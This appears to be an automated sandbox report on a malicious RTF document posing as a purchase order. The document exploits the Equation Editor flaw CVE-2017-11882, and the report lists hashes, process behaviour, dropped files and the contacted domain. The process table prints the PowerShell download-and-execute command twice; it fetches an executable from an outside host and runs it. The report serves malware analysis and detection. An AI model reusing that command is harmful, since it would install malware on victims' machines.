analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

NEW_PO_60587410_REVIEWED.doc

Full analysis: https://app.any.run/tasks/60e3ab85-25e9-44a7-8956-b83c2cf6ad60
Verdict: Malicious activity
Analysis date: September 11, 2019, 11:36:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

D14B5509B614E9F535B4202E2899D06F

SHA1:

8171E9F8A8DAF7F5277AD59000EBB372BBCA0A0D

SHA256:

D6987B91D95C3D9D591C4110B600A9204A7767A0413F797D07A125B9077AC254

SSDEEP:

1536:3LZJgACAnR5+sFjVZSQYatM3ScB9Wj9e9wZWEssssssssszsssssssss1ssssss8:KW+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3432)
    • Executes PowerShell scripts

      • cmd.exe (PID: 460)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 3432)
      • EQNEDT32.EXE (PID: 2868)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3432)
    • Creates files in the user directory

      • powershell.exe (PID: 2580)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2756)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2756)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3432)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe cmd.exe no specs powershell.exe no specs eqnedt32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2756"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NEW_PO_60587410_REVIEWED.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3432"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
460cmd.exe /c PowerShell "try{$nGTZw=$env:temp+'\lVc.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'https://knightshadows.com/bu/sssss_outputB765AFF.exe' -Destination $nGTZw;(New-Object -com Shell.Application).ShellExecute( $nGTZw);}catch{}"C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2580PowerShell "try{$nGTZw=$env:temp+'\lVc.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'https://knightshadows.com/bu/sssss_outputB765AFF.exe' -Destination $nGTZw;(New-Object -com Shell.Application).ShellExecute( $nGTZw);}catch{}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2868"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Total events
1 399
Read events
914
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2756WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR98D9.tmp.cvr
MD5:
SHA256:
2580powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M6HQJVSGYSJ3V6Q3IL2O.temp
MD5:
SHA256:
2580powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
2580powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a194.TMPbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
2756WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$W_PO_60587410_REVIEWED.doc.rtfpgc
MD5:2B3396E9AB6660852069A93C050F2FCA
SHA256:5B870F9D52FA083AF0BDF02962B058EFE0E40E4D861D77E075E695FE86FDAF0E
2756WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B7DEA70F335E5DDC93FE702864A27887
SHA256:5E4B0BB068B9758D42C59BDBB3E585A771C8BE51EE88F713369718C081896434
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
23.95.61.28:443
knightshadows.com
ColoCrossing
US
suspicious

DNS requests

Domain
IP
Reputation
knightshadows.com
  • 23.95.61.28
suspicious

Threats

No threats detected
No debug info